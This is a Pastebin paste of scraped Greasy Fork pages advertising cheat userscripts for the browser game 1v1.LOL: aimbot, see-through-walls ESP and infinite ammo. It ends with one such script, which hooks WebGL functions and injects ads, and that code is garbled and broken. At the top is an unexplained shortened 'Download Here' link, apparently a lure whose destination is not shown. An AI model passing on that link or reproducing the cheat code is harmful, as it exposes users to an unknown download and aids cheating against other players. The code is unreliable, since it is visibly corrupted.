Advertisement
Guest User

1v1 lol scripts

a guest
Nov 8th, 2024
251
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.52 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/5x6y7ezd (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. Greasy Fork
  10. You will need to install an extension such as Tampermonkey, Greasemonkey or Violentmonkey to install this script.
  11. You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.
  12. You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.
  13. You will need to install an extension such as Tampermonkey or Userscripts to install this script.
  14. You will need to install a user script manager extension to install this script.
  15. How to install
  16. You will need to install an extension such as Stylus to install this script.
  17. You will need to install an extension such as Stylus to install this script.
  18. You will need to install an extension such as Stylus to install this script.
  19. You will need to install a user style manager extension to install this script.
  20. You will need to install a user style manager extension to install this script.
  21. Author nekocell Daily installs 76 Total installs 43,846 Ratings 10 5 11 Version 0.4 Created 2022-01-15 Updated 2022-01-28 License N/A
  22. You can also try these related scripts:
  23.  
  24. 1v1.LOL Aimbot, ESP & Wireframe View - Let's you see players behind walls. Comes with a wireframe view mode too. Press V and N to toggle them.
  25. 1v1.exe | 1v1.LOL Rapid fire, Instant relead, and more! - 1v1.LOL hack script - rapid fire, instant reload.
  26. 1v1.lol hacks - 1v1.LOL hack script - infinite ammmo, infinite armor, rapid fire
  27. 1v1.lol Full Auto + Instant shotgun reload! - 1v1.LOL Full auto weapons and easy fats reload for your shotgun! Made by SpruzzYEET on YouTube.
  28. 1v1.www - 1v1.LOL hack script - infinite ammo, infinite armor, rapid fire
  29.  
  30. Greasy Fork
  31. Let's you see players behind walls. Comes with a wireframe view mode too. Press V and N to toggle them.
  32. This script contains antifeatures
  33. Before you install, Greasy Fork would like you to know that this script contains antifeatures, which are things there for the script author's benefit, rather than yours.
  34. This script will inject ads on the sites you visit.
  35. How to install
  36. You will need to install an extension such as Tampermonkey, Greasemonkey or Violentmonkey to install this script.
  37. You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.
  38. You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.
  39. You will need to install an extension such as Tampermonkey or Userscripts to install this script.
  40. You will need to install a user script manager extension to install this script.
  41. How to install
  42. You will need to install an extension such as Stylus to install this script.
  43. You will need to install an extension such as Stylus to install this script.
  44. You will need to install an extension such as Stylus to install this script.
  45. You will need to install a user style manager extension to install this script.
  46. You will need to install a user style manager extension to install this script.
  47. Author Zertalious Daily installs 160 Total installs 51,579 Ratings 10 8 5 Version 0.6 Created 2022-02-18 Updated 2022-12-31 License N/A Antifeatures Ads
  48. What does it do?
  49. Highlights players in red and lets you see them even when they are behind walls. Comes with a wireframe view too which makes all the walls/players render using lines to increase vision. Also has a little aimbot that helps you aim at the enemy when your cursor is close to one.
  50. Keyboard Shortcuts:
  51.  
  52. [T] to toggle Aimbot
  53. [N] to toggle wireframe view
  54. [M] to toggle ESP
  55. [H] to toggle help
  56.  
  57. Greasy Fork
  58. Let's you see players behind walls. Comes with a wireframe view mode too. Press V and N to toggle them.
  59. This script contains antifeatures
  60. Before you install, Greasy Fork would like you to know that this script contains antifeatures, which are things there for the script author's benefit, rather than yours.
  61. This script will inject ads on the sites you visit.
  62. How to install
  63. You will need to install an extension such as Tampermonkey, Greasemonkey or Violentmonkey to install this script.
  64. You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.
  65. You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.
  66. You will need to install an extension such as Tampermonkey or Userscripts to install this script.
  67. You will need to install a user script manager extension to install this script.
  68. How to install
  69. You will need to install an extension such as Stylus to install this script.
  70. You will need to install an extension such as Stylus to install this script.
  71. You will need to install an extension such as Stylus to install this script.
  72. You will need to install a user style manager extension to install this script.
  73. You will need to install a user style manager extension to install this script.
  74. // ==UserScript== // @name 1v1.LOL Aimbot, ESP & Wireframe View // @namespace http://tampermonkey.net/ // @version 0.6 // @description Let's you see players behind walls. Comes with a wireframe view mode too. Press V and N to toggle them. // @author Zertalious (Zert) // @match *://1v1.lol/* // @icon https://www.google.com/s2/favicons?domain=1v1.lol // @grant none // @run-at document-start // @antifeature ads // ==/UserScript== const searchSize = 300; const threshold = 4.5; const aimbotSpeed = 0.15; let aimbotEnabled = false; let espEnabled = false; let wireframeEnabled = true; const WebGL = WebGL2RenderingContext.prototype; HTMLCanvasElement.prototype.getContext = new Proxy( HTMLCanvasElement.prototype.getContext, return Reflect.apply( . arguments ); > > ); WebGL.shaderSource = new Proxy( WebGL.shaderSource, - 1 ) threshold ) ` ); > else if ( args[ 1 ].indexOf( 'SV_Target0' ) > - 1 ) threshold ) ` ); > return Reflect.apply( . arguments ); > > ); WebGL.getUniformLocation = new Proxy( WebGL.getUniformLocation, return result; > > ); WebGL.uniform4fv = new Proxy( WebGL.uniform4fv, return Reflect.apply( . arguments ); > > ); let movementX = 0, movementY = 0; let count = 0; WebGL.drawElements = new Proxy( WebGL.drawElements, ; > const couldBePlayer = args[ 1 ] > 4000; thisArgs.uniform1i( program.uniforms.enabled, ( espEnabled || aimbotEnabled ) && couldBePlayer ); thisArgs.uniform1f( program.uniforms.threshold, threshold ); args[ 0 ] = wireframeEnabled && ! program.isUIProgram && args[ 1 ] > 6 ? thisArgs.LINES : args[ 0 ]; Reflect.apply( . arguments ); if ( aimbotEnabled && couldBePlayer ) > > > > ); window.requestAnimationFrame = new Proxy( window.requestAnimationFrame, 0 && isPlaying ) ) ); rangeEl.classList.add( 'range-active' ); > else movementX = 0; movementY = 0; count = 0; return Reflect.apply( . arguments ); > > ); return Reflect.apply( . arguments ); > > ) const value = parseInt( new URLSearchParams( window.location.search ).get( 'showAd' ), 16 ); const shouldShowAd = isNaN( value ) || Date.now() - value 10 * 60 * 1000; const el = document.createElement( 'div' ); el.innerHTML = ` .dialog .dialog * .close .close:before, .close:after .close:after .close:hover .btn .btn:active .msg @keyframes msg to > .range .range-active Loading ad. ` : ` ESP & Wireframe [T] to toggle aimbot [M] to toggle ESP [N] to toggle wireframe [H] to show/hide help By Zertalious Discord Instagram Twitter More scripts ` > `; const msgEl = el.querySelector( '.msg' ); const dialogEl = el.querySelector( '.dialog' ); const rangeEl = el.querySelector( '.range' ); window.addEventListener( 'DOMContentLoaded', function () 0 ) if ( shouldShowAd ) > ); window.addEventListener( 'keyup', function ( event ) > ); function showMsg( name, bool )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement